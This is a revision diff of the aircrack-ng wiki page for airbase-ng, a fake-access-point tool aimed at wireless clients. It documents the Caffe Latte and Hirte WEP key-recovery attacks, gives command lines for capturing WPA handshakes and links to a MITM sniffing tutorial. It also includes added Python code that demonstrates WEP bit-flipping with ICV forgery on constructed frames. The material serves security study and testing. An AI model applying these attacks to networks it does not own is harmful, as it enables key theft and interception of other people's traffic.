| airbase-ng [2009/01/26 21:16]  – Updated to reflect new SVN changes due to RC2. darkaudax | airbase-ng [2018/03/11 18:54] (current)  – Updated link to issue mister_x | 
|---|---|
| ====== Airbase-ng ====== | ====== Airbase-ng ====== | 
|  |  | 
| ++++++ IMPORTANT ++++++ |  | 
|  |  | 
| This functionality will be available in a future release. It is NOT available currently. |  | 
|  |  | 
| ++++++ IMPORTANT ++++++ |  | 
|  |  | 
| ===== Description ===== | ===== Description ===== | 
|  |  | 
| This documentation is still under development.  There is quite a bit more work to be done on this documentation.  Please post any comments or suggestions to [[http://tinyshell.be/aircrackng/forum/index.php?topic=3247.0|this thread in the Forum]]. | This documentation is still under development.  There is quite a bit more work to be done on this documentation.  Please post any comments or suggestions to [[http://forum.aircrack-ng.org/index.php?topic=3247.0|this thread in the Forum]]. | 
|  |  | 
| Airbase-ng is a multi-purpose tool aimed at attacking clients rather than the Access Point (AP) itself.  Since it is so versatile and flexible, summarizing it is a challenge.  Here are some of the feature highlights: | Airbase-ng is a multi-purpose tool aimed at attacking clients rather than the Access Point (AP) itself.  Since it is so versatile and flexible, summarizing it is a challenge.  Here are some of the feature highlights: | 
| ==== -q Quiet Flag ==== | ==== -q Quiet Flag ==== | 
|  |  | 
| This surpresses printing any statistics or status information. | This suppresses printing any statistics or status information. | 
|  |  | 
| ==== -v Verbose Flag ==== | ==== -v Verbose Flag ==== | 
| There are 3 arguments for "-Y": "in", "out" and "both", which specify the direction of frames to loop through the external application. "in" redirects only incoming frames (those received by the wireless NIC) and leaves outgoing frames untouched; "out" does the opposite and loops only outgoing frames; "both" sends both directions through the second tap interface. | There are 3 arguments for "-Y": "in", "out" and "both", which specify the direction of frames to loop through the external application. "in" redirects only incoming frames (those received by the wireless NIC) and leaves outgoing frames untouched; "out" does the opposite and loops only outgoing frames; "both" sends both directions through the second tap interface. | 
|  |  | 
| There is a small and simple example application to replay all frames on the second interface. The tool is called "replay.py" and is located in "./test". It's written in python, but the language doesn't matter.  It uses pcapy to read the frames and scapy to possibly alter/show and reinject the frames.  The tool as it is, simply replays all frames and prints a short summary of the received frames. The variable "packet" contains the complete ieee80211 packet, which can easily be dissected and modified using scapy. | There is a small and simple example application to replay all frames on the second interface. The tool is called "replay.py" and is located in "./test". It's written in python, but the language doesn't matter.  It uses pcapy to read the frames and scapy to potentially alter/show and reinject the frames.  The tool as it is, simply replays all frames and prints a short summary of the received frames. The variable "packet" contains the complete ieee80211 packet, which can easily be dissected and modified using scapy. | 
|  |  | 
| This can be compared to ettercap filters, but is more powerful, as a real programming language can be used to build complex logic for filtering and packet customization. The downside of using Python is that it adds a delay of around 100 ms and CPU utilization is rather high on a high-speed network, but it is perfect for a demonstration with only a few lines of code. | This can be compared to ettercap filters, but is more powerful, as a real programming language can be used to build complex logic for filtering and packet customization. The downside of using Python is that it adds a delay of around 100 ms and CPU utilization is rather high on a high-speed network, but it is perfect for a demonstration with only a few lines of code. | 
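A filter hook of the kind replay.py is meant to host, as an added Python example (it is not the replay.py shipped in ./test and not code from the aircrack-ng project). It dissects the raw 802.11 frame that the -Y tap interface hands over, using only the standard library so it runs without pcapy or scapy, and decides per frame whether to drop it or hand it back for reinjection. The two sample frames, the BSSID and the station MAC are constructed for the example; in replay.py the same bytes would be the `packet` variable, and scapy's Dot11 layer could do the dissection instead.

```python
import struct
from typing import Optional, Set

FTYPE_MGMT, FTYPE_CTRL, FTYPE_DATA = 0, 1, 2

# Meaning of addr1/addr2/addr3 in data frames, keyed by (ToDS, FromDS).
DATA_ADDR_ROLES = {
    (False, False): ("DA", "SA", "BSSID"),   # ad-hoc / IBSS
    (True, False): ("BSSID", "SA", "DA"),    # station -> AP (what a softAP receives)
    (False, True): ("DA", "BSSID", "SA"),    # AP -> station (what a softAP sends)
    (True, True): ("RA", "TA", "DA"),        # WDS; addr4 carries the SA
}


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_dot11(frame: bytes) -> dict:
    """Dissect the 802.11 MAC header of a raw frame (no radiotap header, no FCS)."""
    if len(frame) < 10:
        raise ValueError("shorter than the smallest 802.11 header")
    fc, duration = struct.unpack_from("<HH", frame, 0)
    info = {
        "type": (fc >> 2) & 0x3,
        "subtype": (fc >> 4) & 0xF,
        "to_ds": bool(fc & 0x0100),
        "from_ds": bool(fc & 0x0200),
        "more_frag": bool(fc & 0x0400),
        "protected": bool(fc & 0x4000),      # WEP/WPA-encrypted body follows
        "duration": duration,
        "addr1": mac_str(frame[4:10]),
    }
    if info["type"] == FTYPE_CTRL:           # ack/rts/cts: the firmware's business
        info["header_len"] = len(frame)
        return info
    if len(frame) < 24:
        raise ValueError("truncated management/data header")
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    info["seq"] = struct.unpack_from("<H", frame, 22)[0] >> 4
    hdr_len = 24
    if info["type"] == FTYPE_DATA:
        roles = DATA_ADDR_ROLES[(info["to_ds"], info["from_ds"])]
        info.update(zip(roles, map(mac_str, (a1, a2, a3))))
        if info["to_ds"] and info["from_ds"]:
            info["SA"] = mac_str(frame[24:30])
            hdr_len = 30
        if info["subtype"] & 0x8:            # QoS data carries a 2-byte QoS control
            hdr_len += 2
    else:                                    # management frames: fixed roles
        info.update({"DA": mac_str(a1), "SA": mac_str(a2), "BSSID": mac_str(a3)})
    info["header_len"] = hdr_len
    info["body"] = frame[hdr_len:]
    return info


def filter_frame(frame: bytes, blocked_stations: Set[str]) -> Optional[bytes]:
    """Per-frame hook: return None to drop the frame, or the bytes to reinject.
    This policy drops data frames whose source station is on the block list."""
    info = parse_dot11(frame)
    if info["type"] == FTYPE_DATA and info.get("SA") in blocked_stations:
        return None
    return frame


# Constructed sample frames (not captures from the page).
BSSID = bytes.fromhex("001122334455")
STATION = bytes.fromhex("66778899aabb")
# WEP-protected data frame, ToDS=1, from the station to the AP; the body starts
# with the 3-byte IV and the key-id byte, followed by ciphertext.
STATION_DATA = (b"\x08\x41" + b"\x00\x00" + BSSID + STATION + b"\xff" * 6
                + b"\x10\x00" + bytes.fromhex("a1b2c300") + bytes(32))
# Beacon (management, subtype 8) from the AP to the broadcast address.
BEACON = (b"\x80\x00" + b"\x00\x00" + b"\xff" * 6 + BSSID + BSSID
          + b"\x00\x00" + bytes(12))

if __name__ == "__main__":
    for name, frame in (("station data", STATION_DATA), ("beacon", BEACON)):
        info = parse_dot11(frame)
        verdict = "drop" if filter_frame(frame, {mac_str(STATION)}) is None else "pass"
        print(name, info["type"], info["subtype"], info.get("SA"), verdict)
```

The address-role table is the part most filters get wrong: on the "in" side of a softAP the client's MAC is addr2 (ToDS=1), on the "out" side it is addr1 (FromDS=1), so a filter keyed on a fixed address slot silently matches nothing in one direction.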
|  |  | 
| ==== -c Channel Flag ==== | ==== -c Channel Flag ==== | 
| ==== -s Force Shared Key Authentication ==== | ==== -s Force Shared Key Authentication ==== | 
|  |  | 
| When specfiied, this forces shared key authentication for all clients. | When specified, this forces shared key authentication for all clients. | 
|  |  | 
| The soft AP will send an "authentication method unsupported" rejection to any open system | The soft AP will send an "authentication method unsupported" rejection to any open system | 
| ==== -L Caffe Latte Attack ==== | ==== -L Caffe Latte Attack ==== | 
|  |  | 
| Airbase-ng also contains the new Caffe Latte attack, which is also implemented in aireplay-ng as attack "-6".  It can be used with "-L" or "--caffe-latte".  This attack works specifically against clients: it waits for a broadcast ARP request, which happens to be a gratuitous ARP (see [[http://wiki.wireshark.org/Gratuitous_ARP|this page]] for an explanation of what a gratuitous ARP is).  It then flips a few bits in the sender MAC and IP, corrects the ICV (CRC-32) and sends the frame back to the client it came from.  The reason this attack works in practice is that Windows, at least, sends gratuitous ARPs once the layer-2 connection is established and either a static IP is configured, or DHCP fails and Windows assigns itself an address out of 169.254.X.X. | Airbase-ng also contains the new Caffe Latte attack, which is also implemented in aireplay-ng as attack "-6".  It can be used with "-L" or "--caffe-latte".  This attack works specifically against clients: it waits for a broadcast ARP request, which happens to be a gratuitous ARP (see [[http://wiki.wireshark.org/Gratuitous_ARP|this page]] for an explanation of what a gratuitous ARP is).  It then flips a few bits in the sender MAC and IP, corrects the ICV (CRC-32) and sends the frame back to the client it came from.  The reason this attack works in practice is that Windows, at least, sends gratuitous ARPs once the layer-2 connection is established and either a static IP is configured, or DHCP fails and Windows assigns itself an address out of 169.254.X.X. | 
|  |  | 
| "-x <pps>" sets the number of packets per second to send when performing the Caffe Latte attack. At the moment the attack does not stop by itself; it keeps sending ARP requests.  Airodump-ng is needed to capture the replies. | "-x <pps>" sets the number of packets per second to send when performing the Caffe Latte attack. At the moment the attack does not stop by itself; it keeps sending ARP requests.  Airodump-ng is needed to capture the replies. | 
| This attack listens for an ARP request or IP packet from the client.  Once one is received, a small amount of PRGA is extracted and then used to create an ARP request packet targeted at the client.  This ARP request is actually made up of multiple packet fragments such that, when received, the client will respond. | This attack listens for an ARP request or IP packet from the client.  Once one is received, a small amount of PRGA is extracted and then used to create an ARP request packet targeted at the client.  This ARP request is actually made up of multiple packet fragments such that, when received, the client will respond. | 
|  |  | 
| This attack works especially well against ad-hoc networks.  As well it can be used against softAP clients and normal AP clients. | This attack works especially well against ad-hoc networks.  As well, it can be used against softAP clients and normal AP clients. | 
|  |  | 
| This option includes added compatibility with some clients. Random source IPs and MACs are also used for the cfrag attack to evade simple flood protection. | This option includes added compatibility with some clients. Random source IPs and MACs are also used for the cfrag attack to evade simple flood protection. | 
| ==== -x Number of Packets per Second ==== | ==== -x Number of Packets per Second ==== | 
|  |  | 
| This sets the transmission rate in packets per second (default: 100). | This sets the transmission rate in packets per second (default: 100). | 
|  |  | 
| ==== -y Disable Broadcast Probes ==== | ==== -y Disable Broadcast Probes ==== | 
| When using this option, the fake AP will not respond to broadcast probes.  A broadcast probe is where the the specific AP is not identified uniquely.  Typically, most APs will respond with probe responses to a broadcast probe.  This flag will prevent this happening.  It will only respond when the specific AP is uniquely requested. | When using this option, the fake AP will not respond to broadcast probes.  A broadcast probe is where the specific AP is not identified uniquely.  Typically, most APs will respond with probe responses to a broadcast probe.  This flag will prevent this happening.  It will only respond when the specific AP is uniquely requested. | 
|  |  | 
| ==== -0 Set WPA/WEP Tags ==== | ==== -0 Set WPA/WEP Tags ==== | 
|  |  | 
| ==== -z Set WPA Tag ==== | ==== -z Set WPA Tag ==== | 
| This specifies the WPA beacon tags.  The valid values are: 1=WEP40, 2=TKIP, 3=WRAP, 4=CCMP, 5=WEP104 | This specifies the WPA beacon tags.  The valid values are: 1=WEP40, 2=TKIP, 3=WRAP, 4=CCMP, 5=WEP104.  It is recommended that you also set the WEP flag in the beacon with "-W 1" when using this parameter since some clients get confused without it. | 
|  |  | 
| ==== -Z Set WPA2 Tag ==== | ==== -Z Set WPA2 Tag ==== | 
| This specifies the WPA2 beacon tags.  The valid values are the same as WPA. | This specifies the WPA2 beacon tags.  The valid values are the same as WPA.  It is recommended that you also set the WEP flag in the beacon with "-W 1" when using this parameter since some clients get confused without it. | 
|  |  | 
| ==== -V EAPOL Type ==== | ==== -V EAPOL Type ==== | 
| This specifies the valid EAPOL types.  The valid values are: 1=MD5, 2=SHA1, 3=auto | This specifies the valid EAPOL types.  The valid values are: 1=MD5, 2=SHA1, 3=auto | 
|  |  | 
|  |  | 
| ==== -F File Name Prefix ==== | ==== -F File Name Prefix ==== | 
| The -P option must also be specified in order to use this option.  The wildcard ESSIDs will also be beaconed for this number of seconds.  A good typical value to use is "-C 60". | The -P option must also be specified in order to use this option.  The wildcard ESSIDs will also be beaconed for this number of seconds.  A good typical value to use is "-C 60". | 
|  |  | 
| When running in the default mode (no ESSIDs) or with the -P parameter, the -C option can be used to enable beacon broadcasting of the ESSIDs seen in directed probes. This allows one client probing for a network to trigger a beacon for the same network for a brief period of time (the -C parameter is the number of seconds to beacon newly probed ESSIDs). This works well when some clients send directed probes while others listen passively for beacons: a client that sends directed probes causes a beacon that wakes up the passive client and makes it join the network as well. This is especially useful with Vista clients (which in many cases listen passively for beacons) that share the same WiFi network as Linux/Mac OS X clients, which send directed probes. | When running in the default mode (no ESSIDs) or with the -P parameter, the -C option can be used to enable beacon broadcasting of the ESSIDs seen in directed probes. This allows one client probing for a network to trigger a beacon for the same network for a brief period of time (the -C parameter is the number of seconds to beacon newly probed ESSIDs). This works well when some clients send directed probes while others listen passively for beacons: a client that sends directed probes causes a beacon that wakes up the passive client and makes it join the network as well. This is especially useful with Vista clients (which in many cases listen passively for beacons) that share the same WiFi network as Linux/Mac OS X clients, which send directed probes. | 
|  |  | 
| ==== Beacon Frames ==== | ==== Beacon Frames ==== | 
| ==== Control Frame Handling ==== | ==== Control Frame Handling ==== | 
|  |  | 
| Control frames (ack/rts/cts) are never sent by the code, but sometimes read (the firmware should handle them).  Management and data frames can always be sent; a station does not need to authenticate before associating, or even before sending data frames.  They can be sent right away.  Real clients will still authenticate and associate and the softAP sends the correct answers, but airbase-ng does not check the properties and simply allows all stations to connect (subject to the ESSID and client MAC filters).  So authentication cannot fail (unless SKA is forced), and neither can association.  The AP never sends deauthentication or disassociation frames in normal operation mode. | Control frames (ack/rts/cts) are never sent by the code, but sometimes read (the firmware should handle them).  Management and data frames can always be sent; a station does not need to authenticate before associating, or even before sending data frames.  They can be sent right away.  Real clients will still authenticate and associate and the softAP sends the correct answers, but airbase-ng does not check the properties and simply allows all stations to connect (subject to the ESSID and client MAC filters).  So authentication cannot fail (unless SKA is forced), and neither can association.  The AP never sends deauthentication or disassociation frames in normal operation mode. | 
|  |  | 
| It has been implemented in a way that maximizes compatibility and the chances of keeping a station connected. | It has been implemented in a way that maximizes compatibility and the chances of keeping a station connected. | 
| ==== Filtering ==== | ==== Filtering ==== | 
|  |  | 
| There is rich filtering capabilites. | There are rich filtering capabilities. | 
|  |  | 
| To limit the supported ESSIDs, you can specify "-e <ESSID>" to add an ESSID to the list of allowed ESSIDs, or use "-E <ESSIDfile>" to read a list of allowed ESSIDs out of this file (one ESSID per line). | To limit the supported ESSIDs, you can specify "-e <ESSID>" to add an ESSID to the list of allowed ESSIDs, or use "-E <ESSIDfile>" to read a list of allowed ESSIDs out of this file (one ESSID per line). | 
| * -d 00:06:62:F8:1E:2C filters the data captured to the fake AP MAC (this is optional) | * -d 00:06:62:F8:1E:2C filters the data captured to the fake AP MAC (this is optional) | 
| * -w specifies the file name prefix of the captured data | * -w specifies the file name prefix of the captured data | 
| * ath0 specifies the wireless interface to to capture data on | * wlan0 specifies the wireless interface to capture data on | 
|  |  | 
| Here is what the window looks like when airbase-ng has received a packet from the client and has successfully started the attack: | Here is what the window looks like when airbase-ng has received a packet from the client and has successfully started the attack: | 
| ==== Caffe Latte Attack in Access Point mode ==== | ==== Caffe Latte Attack in Access Point mode ==== | 
|  |  | 
| This attack obtains the WEP key from a client.  It depends on receiving at least one gratutitous ARP request from the client after it has associated with the fake AP. | This attack obtains the WEP key from a client.  It depends on receiving at least one gratuitous ARP request from the client after it has associated with the fake AP. | 
|  |  | 
| Enter: | Enter: | 
|  |  | 
| airbase-ng -c 9 -e teddy -z 2 rausb0 | airbase-ng -c 9 -e teddy -z 2 -W 1 rausb0 | 
|  |  | 
| Where: | Where: | 
| * -e teddy filters a single SSID | * -e teddy filters a single SSID | 
| * -z 2 specifies TKIP | * -z 2 specifies TKIP | 
|  | * -W 1 sets the WEP flag because some clients get confused without it. | 
| * rausb0 specifies the wireless interface to use | * rausb0 specifies the wireless interface to use | 
|  |  | 
|  |  | 
| * -c 9 specifies the channel | * -c 9 specifies the channel | 
| * -d 00:C0:C6:94:F4:87 filters the data captured to the fake AP MAC.  It is the MAC of the card running the fake AP.  This is optional. | * -d 00:C0:C6:94:F4:87 filters the data captured to the fake AP MAC.  It is the MAC of the card running the fake AP.  This is optional. | 
| * -w specifies the file name of the captured data | * -w specifies the file name of the captured data | 
| * wlan0 specifies the wireless interface to capture data on | * wlan0 specifies the wireless interface to capture data on | 
|  |  | 
| When the client connects, notice the "WPA handshake: 00:C0:C6:94:F4:87" in the top right-hand corner of the screen below: | When the client connects, notice the "WPA handshake: 00:C0:C6:94:F4:87" in the top right-hand corner of the screen below: | 
|  |  | 
| CH  9 ][ Elapsed: 5 mins ][ 2008-03-21 10:26 ][ WPA handshake: 00:C0:C6:94:F4:87 | CH  9 ][ Elapsed: 5 mins ][ 2008-03-21 10:26 ][ WPA handshake: 00:C0:C6:94:F4:87 | 
|  |  | 
| Enter: | Enter: | 
|  |  | 
| airbase-ng -c 9 -e teddy -Z 4 rausb0 | airbase-ng -c 9 -e teddy -Z 4 -W 1 rausb0 | 
|  |  | 
| The remainder is the same as for the WPA handshake capture. | The remainder is the same as for the WPA handshake capture. | 
| A new tap interface "atX" will be created, which acts as the "wired side" of the AP. In order to use the AP, this new interface must be brought up with ifconfig and needs an IP. The assigned MAC is automatically set to the BSSID (by default the wireless interface MAC). Once an IP is assigned and the client uses a static IP out of the same subnet, there is a working Ethernet connection between the AP and the client. Any daemon can be bound to that interface, for example a DHCP and DNS server. Together with kernel ip_forwarding and a proper iptables masquerading rule, the softAP acts as a wireless router. Any tool that operates on Ethernet can be bound to this interface. | A new tap interface "atX" will be created, which acts as the "wired side" of the AP. In order to use the AP, this new interface must be brought up with ifconfig and needs an IP. The assigned MAC is automatically set to the BSSID (by default the wireless interface MAC). Once an IP is assigned and the client uses a static IP out of the same subnet, there is a working Ethernet connection between the AP and the client. Any daemon can be bound to that interface, for example a DHCP and DNS server. Together with kernel ip_forwarding and a proper iptables masquerading rule, the softAP acts as a wireless router. Any tool that operates on Ethernet can be bound to this interface. | 
|  |  | 
| This [[http://tinyshell.be/aircrackng/forum/index.php?topic=3983.msg23110#msg23110|forum posting]] provides an example of the commands needed to set up the softAP. This [[http://tinyshell.be/aircrackng/forum/index.php?topic=4495.msg25342#msg25342|forum posting]] provides an iptables troubleshooting tip. | This [[http://forum.aircrack-ng.org/index.php?topic=3983.msg23110#msg23110|forum posting]] provides an example of the commands needed to set up the softAP. This [[http://forum.aircrack-ng.org/index.php?topic=4495.msg25342#msg25342|forum posting]] provides an iptables troubleshooting tip. | 
|  |  | 
| Here are some links that you may find useful in getting bridging operational.  In the madwifi-project.org one, just use at0 where ath0 is referenced. | Here are some links that you may find useful in getting bridging operational.  In the madwifi-project.org one, just use at0 where ath0 is referenced. | 
| ==== How Does the Hirte Attack Work? ==== | ==== How Does the Hirte Attack Work? ==== | 
|  |  | 
| This is client attack which can use any IP or ARP packet.  The follow describes the attack in detail. | This is a client attack which can use any IP or ARP packet.  The following describes the attack in detail. | 
|  |  | 
| The basic idea is to generate an ARP request to be sent back to the client such that the client responds. | The basic idea is to generate an ARP request to be sent back to the client such that the client responds. | 
| The source IP in the packet received from the client is at a known position: position 23 for ARP or 21 for IP.  The packet is assumed to be ARP if it is 68 or 86 bytes long and has a broadcast destination MAC address; otherwise it is assumed to be an IP packet. | The source IP in the packet received from the client is at a known position: position 23 for ARP or 21 for IP.  The packet is assumed to be ARP if it is 68 or 86 bytes long and has a broadcast destination MAC address; otherwise it is assumed to be an IP packet. | 
|  |  | 
| In order to send a valid ARP request back to the client, we need move the source IP to position 33.  Of course you can't simply move bytes around, that would invalidate the packet.  So instead, we use the concept of packet fragmentation to achieve this.  The ARP request is sent to the client as two fragments.  The first fragment length is selected such that the incoming source IP is moved to position 33 when the fragments are ultimately reassembled by the client.  The second fragment is the original packet received from the client. | In order to send a valid ARP request back to the client, we need to move the source IP to position 33.  Of course you can't simply move bytes around, that would invalidate the packet.  So instead, we use the concept of packet fragmentation to achieve this.  The ARP request is sent to the client as two fragments.  The first fragment length is selected such that the incoming source IP is moved to position 33 when the fragments are ultimately reassembled by the client.  The second fragment is the original packet received from the client. | 
|  |  | 
| In the case of an IP packet, a similar technique is used.  However, due to the more limited amount of PRGA available, three fragments plus the original packet are used. | In the case of an IP packet, a similar technique is used.  However, due to the more limited amount of PRGA available, three fragments plus the original packet are used. | 
|  |  | 
| In all cases, bit flipping is used to ensure the CRC is correct.  Additionally, bit flipping is used to ensure the source MAC of the ARP contained within the fragmented packet is not multicast. | In all cases, bit flipping is used to ensure the CRC is correct.  Additionally, bit flipping is used to ensure the source MAC of the ARP contained within the fragmented packet is not multicast. | 
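The bit flipping with ICV correction that both the Caffe Latte section above and the Hirte description here depend on, as an added Python example; it is not code from airbase-ng or the aircrack-ng project. The example implements WEP itself (RC4 keystream plus CRC-32 ICV), builds a constructed gratuitous ARP from an invented client (the key, IV, MAC and IP are all made up), then modifies the encrypted frame without knowing the key and shows that the client's ICV check still passes. The offsets 16, 22 and 32 are the zero-based equivalents of the page's positions 23 and 33 (counted from 1) for the sender and target IP; the Hirte function shows only the fragment-length arithmetic, not the further field corrections the page mentions.

```python
import struct
import zlib

# Constructed values for the example (none of them come from the page).
WEP_KEY = bytes.fromhex("0102030405")        # 40-bit shared key, known only to AP and client
IV = bytes.fromhex("a1b2c3")                 # IV the client picked for its frame
CLIENT_MAC = bytes.fromhex("66778899aabb")
CLIENT_IP = bytes([169, 254, 12, 34])        # self-assigned 169.254.x.x, as the page describes

LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")
# Zero-based offsets in the decrypted body (LLC/SNAP + ARP). The page's
# "position 23" and "position 33" are offsets 22 and 32 counted from 1.
SENDER_MAC_OFF, SENDER_IP_OFF, TARGET_IP_OFF = 16, 22, 32


def rc4(key: bytes, length: int) -> bytes:
    """RC4 keystream; WEP keys it with IV || shared key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(plaintext: bytes) -> bytes:
    """WEP ICV: CRC-32 over the plaintext, appended little-endian."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def gratuitous_arp(mac: bytes, ip: bytes) -> bytes:
    """LLC/SNAP + ARP request with sender IP == target IP, as Windows sends it."""
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 1) + mac + ip + bytes(6) + ip
    return LLC_SNAP_ARP + arp


def wep_encrypt(iv: bytes, key: bytes, plaintext: bytes) -> bytes:
    data = plaintext + icv(plaintext)
    return xor(data, rc4(iv + key, len(data)))


def wep_decrypt(iv: bytes, key: bytes, body: bytes):
    """Returns (plaintext, icv_ok); a real client drops the frame when icv_ok is False."""
    data = xor(body, rc4(iv + key, len(body)))
    plaintext = data[:-4]
    return plaintext, data[-4:] == icv(plaintext)


def flip_and_fix_icv(enc_body: bytes, delta: bytes) -> bytes:
    """XOR `delta` into the encrypted payload and patch the encrypted ICV so the
    frame still verifies. Needs neither key nor plaintext: CRC-32 is affine, so
    crc(p ^ d) == crc(p) ^ crc(d) ^ crc(zeros of the same length), and XOR passes
    straight through the RC4 keystream."""
    n = len(enc_body) - 4
    if len(delta) != n:
        raise ValueError("delta must cover exactly the payload bytes")
    icv_delta = (zlib.crc32(delta) ^ zlib.crc32(bytes(n))) & 0xFFFFFFFF
    return xor(enc_body, delta + struct.pack("<I", icv_delta))


def caffe_latte_delta(body_len: int) -> bytes:
    """Flip low bits of the sender MAC and sender IP, leaving the target IP (the
    client's own address) intact so the client still answers. Byte 16 holds the
    I/G bit and is not touched, so the sender MAC stays unicast."""
    delta = bytearray(body_len)
    delta[SENDER_MAC_OFF + 5] ^= 0x0F
    delta[SENDER_IP_OFF + 3] ^= 0x0F
    return bytes(delta)


def hirte_first_fragment_len() -> int:
    """Hirte's offset trick: a first fragment of this length, reassembled in front
    of the client's own packet, lands the client's sender IP on the target IP slot."""
    return TARGET_IP_OFF - SENDER_IP_OFF


def demo():
    """Attacker forges from the captured frame; client decrypts and checks the ICV."""
    original = gratuitous_arp(CLIENT_MAC, CLIENT_IP)
    captured = wep_encrypt(IV, WEP_KEY, original)              # seen over the air
    forged = flip_and_fix_icv(captured, caffe_latte_delta(len(original)))
    decrypted, ok = wep_decrypt(IV, WEP_KEY, forged)          # the client's view
    return original, decrypted, ok


if __name__ == "__main__":
    orig, dec, ok = demo()
    print("ICV still valid:", ok)
    print("sender IP:", ".".join(map(str, dec[SENDER_IP_OFF:SENDER_IP_OFF + 4])))
    print("target IP:", ".".join(map(str, dec[TARGET_IP_OFF:TARGET_IP_OFF + 4])))
```

The point to take away is that the ICV adds no integrity: the attacker never learns the key or the plaintext, only where the fields sit, and the client's reply to the forged request is a fresh encrypted frame with a new IV, which is exactly what aircrack-ng needs to recover the key.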
|  |  | 
|  | ==== SoftAP with Internet connection and MITM sniffing ==== | 
|  |  | 
|  | This [[http://forum.aircrack-ng.org/index.php?topic=7172.0|forum thread]] provides a tutorial for SoftAP with Internet connection and MITM sniffing. | 
|  |  | 
|  |  | 
| ===== Usage Troubleshooting ===== | ===== Usage Troubleshooting ===== | 
| ==== Driver Limitations ==== | ==== Driver Limitations ==== | 
|  |  | 
| Some drivers, like r8187, do not capture the packets they transmit themselves.  The implication is that the softAP will not show up in airodump-ng.  You can work around this by using two wireless cards, one to inject and one to capture. Alternatively, you can use the rtl8187 driver. | Some drivers, like r8187, do not capture the packets they transmit themselves.  The implication is that the softAP will not show up in airodump-ng.  You can work around this by using two wireless cards, one to inject and one to capture. Alternatively, you can use the rtl8187 driver. | 
|  |  | 
| The madwifi-ng driver currently does not support the Caffe Latte or Hirte attacks.  The root cause is deep within the madwifi-ng driver: it does not properly synchronize speeds with the client, so the client never receives the packets. If you need these attacks, try the ath5k driver. | The madwifi-ng driver currently does not support the Caffe Latte or Hirte attacks.  The root cause is deep within the madwifi-ng driver: it does not properly synchronize speeds with the client, so the client never receives the packets. If you need these attacks, try the ath5k driver. | 
| ==== Broken SKA error message ==== | ==== Broken SKA error message ==== | 
|  |  | 
| You receive "Broken SKA: <MAC address> (expected: ??, got ?? bytes)" or similar. When using the "-S" option with values other than 128, some clients fail.  This message indicates that the number of bytes actually received differs from the number requested.  Either don't use the option, or try different values of "-S" to see which one eliminates the error. | You receive "Broken SKA: <MAC address> (expected: ??, got ?? bytes)" or similar. When using the "-S" option with values other than 128, some clients fail.  This message indicates that the number of bytes actually received differs from the number requested.  Either don't use the option, or try different values of "-S" to see which one eliminates the error. | 
|  |  | 
| ==== "write failed: Message too long" / "wi_write(): Illegal seek" error messages ==== | ==== "write failed: Message too long" / "wi_write(): Illegal seek" error messages ==== | 
|  |  | 
| See this [[http://trac.aircrack-ng.org/ticket/469|trac ticket]] for a workaround.  The trac ticket explains the root cause and how to adjust the MTU to avoid the problem. | See this [[https://github.com/aircrack-ng/aircrack-ng/issues/469|GitHub issue]] for a workaround.  The issue explains the root cause and how to adjust the MTU to avoid the problem. | 
|  |  | 
|  | ==== Error creating tap interface: Permission denied ==== | 
|  |  | 
| ===== Related Commands ===== | See the following [[faq#why_do_i_get_error_creating_tap_interfacepermission_denied_or_a_similar_message|FAQ entry]]. | 
|  |  | 
| Since the version has not been officially released, the aireplay-ng documentation does not reflect new features which are related to airbase-ng.  This section is some documentation on this. | ===== Related Commands ===== | 
|  |  | 
| "-D" is a new option that has been added to aireplay-ng.  By default, aireplay-ng listens for beacons from the specified AP and fails if it does not hear any beacons.  The "-D" option disables this requirement. | "-D" is a new option that has been added to aireplay-ng.  By default, aireplay-ng listens for beacons from the specified AP and fails if it does not hear any beacons.  The "-D" option disables this requirement. |